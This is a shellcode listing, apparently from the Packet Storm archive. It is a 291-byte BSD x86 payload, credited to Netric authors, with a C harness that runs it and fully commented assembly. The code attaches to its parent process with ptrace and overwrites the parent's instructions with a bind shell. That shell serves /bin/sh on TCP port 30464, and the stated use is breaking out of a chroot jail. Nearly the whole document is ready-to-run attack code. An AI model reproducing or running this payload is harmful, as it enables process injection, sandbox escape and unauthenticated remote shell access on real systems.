291 byte BSD ptrace shellcode which injects a bindcode into the ppid, useful for breaking chroot.
6550b1322a482de0869c99df39964fef13a59b4b140fc85adee39bda14d4dcaf/* BSD-x86 291 byte ptrace shellcode by eSDee of Netric (www.netric.org) */
char
shellcode[]=
"\x31\xc0\xb0\x27\xcd\x80\x89\x45"
"\x04\x31\xc0\x31\xd2\x31\xc9\x50"
"\x50\xff\x75\x04\xb1\x09\x51\x50"
"\xb0\x1a\xcd\x80\x39\xc2\x74\x02"
"\xeb\x5f\x31\xc0\x50\x50\x50\xff"
"\x75\x04\x50\xb0\x07\xcd\x80\x31"
"\xc0\x50\x89\xea\x83\xc2\x08\x89"
"\x55\xfc\x52\xff\x75\x04\xb1\x21"
"\x51\x50\xb0\x1a\xcd\x80\x8b\x55"
"\x28\x89\x55\xf8\x31\xf6\xeb\x37"
"\x5e\x31\xc9\x31\xc0\x31\xdb\x8a"
"\x1e\x53\x46\xb0\x90\x38\xd8\x74"
"\x11\x52\xff\x75\x04\xb1\x04\x51"
"\x50\xb0\x1a\xcd\x80\x31\xc0\x42"
"\xeb\xdf\x31\xc0\x50\x50\xff\x75"
"\x04\xb1\x0a\x51\x50\xb0\x1a\xcd"
"\x80\x31\xc0\xb0\x01\xcd\x80\xe8"
"\xc4\xff\xff\xff"
/* bindcode starts here */
"\x31\xc0\x31\xdb"
"\x31\xc9\x31\xd2\xb0\x61\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x8d\x0c\x24\x51\xcd\x80\xb1\x02"
"\x31\xc9\x51\x51\x51\x80\xc1\x77"
"\x66\x51\xb5\x02\x66\x51\x8d\x0c"
"\x24\xb2\x10\x52\x51\x50\x8d\x0c"
"\x24\x51\x89\xc2\x31\xc0\xb0\x68"
"\xcd\x80\xb3\x01\x53\x52\x8d\x0c"
"\x24\x51\x31\xc0\xb0\x6a\xcd\x80"
"\x31\xc0\x50\x50\x52\x8d\x0c\x24"
"\x51\x31\xc9\xb0\x1e\xcd\x80\x89"
"\xc3\x53\x51\x31\xc0\xb0\x5a\xcd"
"\x80\x41\x53\x51\x31\xc0\xb0\x5a"
"\xcd\x80\x41\x53\x51\x31\xc0\xb0"
"\x5a\xcd\x80\x31\xdb\x53\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x31\xc0\x50\x54\x53\x50"
"\xb0\x3b\xcd\x80\x31\xc0\xb0\x01"
"\xcd\x80"
"\x90"; /* and a NOP to end */
int
main()
{
/* __asm( "xorl %eax,%eax
movb $0x27,%al # SYS_getppid
int $0x80
movl %eax,4(%ebp)
xorl %eax,%eax
xorl %edx,%edx
xorl %ecx,%ecx
pushl %eax
pushl %eax
pushl 4(%ebp) # getppid
movb $0x9, %cl # PT_ATTACH
pushl %ecx
pushl %eax
movb $0x1A,%al # SYS_ptrace
int $0x80 # ptrace(PT_ATTACH,getppid(),NULL,NULL);
cmp %eax,%edx
je PTRACE_WAIT
jmp EXIT # failed
PTRACE_WAIT:
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
pushl 4(%ebp) # getppid
pushl %eax
movb $0x07,%al # SYS_wait4
int $0x80
xorl %eax,%eax
pushl %eax
movl %ebp,%edx
addb $8, %edx
movl %edx, -4(%ebp)
pushl %edx
pushl 4(%ebp) # getppid
movb $0x21,%cl # PT_GETREGS
pushl %ecx
pushl %eax
movb $0x1A,%al # SYS_ptrace
int $0x80 # ptrace(PT_GETREGS,getppid(),®s,NULL);
movl 40(%ebp), %edx
movl %edx, -8(%ebp)
xorl %esi,%esi
jmp GETEIP
BACK:
popl %esi
PTRACE_WRITE:
xorl %ecx,%ecx
xorl %eax,%eax
xorl %ebx,%ebx
movb (%esi), %ebx
pushl %ebx
inc %esi
movb $0x90, %al
cmpb %bl, %al # end of the shellcode
je PTRACE_DETACH
pushl %edx
pushl 4(%ebp) # getppid
movb $0x4,%cl
pushl %ecx
pushl %eax
movb $0x1A,%al # SYS_ptrace
int $0x80 # ptrace(PT_WRITE_I,getppid(),eip++,getchar);
xorl %eax,%eax
inc %edx
jmp PTRACE_WRITE
PTRACE_DETACH:
xorl %eax,%eax
pushl %eax
pushl %eax
pushl 4(%ebp) # getppid
movb $0xA, %cl
pushl %ecx # PT_DETACH
pushl %eax
movb $0x1A,%al # SYS_ptrace
int $0x80 # ptrace(PT_DETACH,getppid(),NULL,NULL);
EXIT:
xorl %eax,%eax
movb $0x01, %al # SYS_exit
int $0x80
GETEIP:
call BACK
SHELLCODE: # shellcode by r00tdude (ilja@netric.org)
xorl %eax,%eax # binds /bin/sh on port 30464
xorl %ebx,%ebx
xorl %ecx,%ecx
xorl %edx,%edx
movb $0x61,%al
pushl %ecx
movb $0x6,%cl
pushl %ecx
movb $0x1,%cl
pushl %ecx
movb $0x2,%cl
pushl %ecx
leal (%esp),%ecx
pushl %ecx
int $0x80
movb $0x2,%cl
xorl %ecx,%ecx
pushl %ecx
pushl %ecx
pushl %ecx
addb $0x77,%cl
pushw %cx
movb $0x2,%ch
pushw %cx
leal (%esp),%ecx
movb $0x10,%dl
pushl %edx
pushl %ecx
pushl %eax
leal (%esp),%ecx
pushl %ecx
movl %eax,%edx
xorl %eax,%eax
movb $0x68,%al
int $0x80
movb $0x1,%bl
pushl %ebx
pushl %edx
leal (%esp),%ecx
pushl %ecx
xorl %eax,%eax
movb $0x6a,%al
int $0x80
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %edx
leal (%esp),%ecx
pushl %ecx
xorl %ecx,%ecx
movb $0x1e,%al
int $0x80
movl %eax,%ebx
pushl %ebx
pushl %ecx
xorl %eax,%eax
movb $0x5a,%al
int $0x80
inc %ecx
pushl %ebx
pushl %ecx
xorl %eax,%eax
movb $0x5a,%al
int $0x80
inc %ecx
pushl %ebx
pushl %ecx
xorl %eax,%eax
movb $0x5a,%al
int $0x80
xorl %ebx,%ebx
pushl %ebx
pushl $0x68732f6e
pushl $0x69622f2f
movl %esp,%ebx
xorl %eax,%eax
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
xorl %eax,%eax
movb $0x1,%al
int $0x80
nop");
*/
void (*funct)();
(long) funct = &shellcode;
printf("Length: %d\n", strlen(shellcode));
funct();
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed